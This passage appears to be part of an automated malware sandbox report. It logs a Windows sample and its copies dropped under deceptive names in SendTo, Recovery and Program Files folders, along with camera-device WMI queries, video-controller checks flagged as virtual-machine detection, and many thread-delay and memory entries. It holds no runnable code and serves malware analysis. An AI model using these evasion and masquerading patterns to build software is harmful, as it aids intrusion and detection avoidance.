                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeMemory allocated: 13F0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeMemory allocated: 1B080000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeMemory allocated: 1090000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeMemory allocated: 1AC80000 memory reserve | memory write watchJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeMemory allocated: 690000 memory reserve | memory write watchJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeMemory allocated: 1A3B0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeMemory allocated: 11B0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeMemory allocated: 1B0A0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeMemory allocated: BF0000 memory reserve | memory write watch
                      Source: C:\Recovery\RuntimeBroker.exeMemory allocated: 1A7A0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeMemory allocated: F10000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeMemory allocated: 1A920000 memory reserve | memory write watch
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeMemory allocated: DB0000 memory reserve | memory write watch
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeMemory allocated: 1A960000 memory reserve | memory write watch
                      Source: C:\Recovery\RuntimeBroker.exeMemory allocated: 26A0000 memory reserve | memory write watch
                      Source: C:\Recovery\RuntimeBroker.exeMemory allocated: 1A6A0000 memory reserve | memory write watch
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeMemory allocated: 2850000 memory reserve | memory write watch
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeMemory allocated: 1AB00000 memory reserve | memory write watch
                      Source: C:\Recovery\RuntimeBroker.exeMemory allocated: 30C0000 memory reserve | memory write watch
                      Source: C:\Recovery\RuntimeBroker.exeMemory allocated: 1B0C0000 memory reserve | memory write watch
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeMemory allocated: 1090000 memory reserve | memory write watch
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeMemory allocated: 1AAA0000 memory reserve | memory write watch
                      Source: C:\Recovery\RuntimeBroker.exeMemory allocated: 1770000 memory reserve | memory write watch
                      Source: C:\Recovery\RuntimeBroker.exeMemory allocated: 1B2A0000 memory reserve | memory write watch
                      Source: C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exeMemory allocated: 1270000 memory reserve | memory write watch
                      Source: C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exeMemory allocated: 1B130000 memory reserve | memory write watch
                      Source: C:\Recovery\RuntimeBroker.exeMemory allocated: 5F0000 memory reserve | memory write watch
                      Source: C:\Recovery\RuntimeBroker.exeMemory allocated: 1A5A0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 600000
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 599856
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 599748
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 599640
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 599530
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 599417
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 599297
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 599178
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 599023
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 3600000
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 598719
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 598312
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 597406
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 596969
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 596250
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 596015
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 595625
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 594812
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 594594
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 594250
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 593875
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 593734
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 593437
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 593140
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 592781
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 592199
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 591937
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 591578
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 591203
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 590656
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 590375
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 589437
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 589140
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 588672
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 588312
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 587946
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 587617
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 586703
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 586234
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 585875
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 585640
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 585328
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 584969
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 584437
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 584091
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 583686
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 583297
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 582812
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 582494
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 582187
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 581888
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 581544
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 581359
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 581216
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 580969
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 580765
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 580562
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 580362
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 580109
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 579684
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 579469
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 579265
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 579078
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 578958
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 578784
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 578640
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 578424
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 578250
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 578031
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 577850
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 577547
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 576906
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 576625
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 576312
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 576089
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 575859
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 575664
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 575453
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 575261
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 575109
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 574944
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 574609
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 574241
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 574118
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 573984
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 573845
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 573734
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 573624
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 573515
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 573403
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 573297
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 573155
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 573043
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 572920
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 572798
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 572687
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 572552
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 572359
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 572217
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 572047
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 571781
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 571572
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 571449
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 571311
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 571156
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 571045
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 300000
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 570935
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 570827
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 570717
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 570609
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 570499
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 570390
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 570264
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 570156
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 570044
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 569937
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 569828
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 569719
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 569603
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 569333
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 569015
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 568902
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 568797
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 568687
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 568578
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 568459
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 568344
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 568234
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 922337203685477
                      Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 922337203685477
                      Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 922337203685477
                      Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 922337203685477
                      Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4549Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4333
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3358
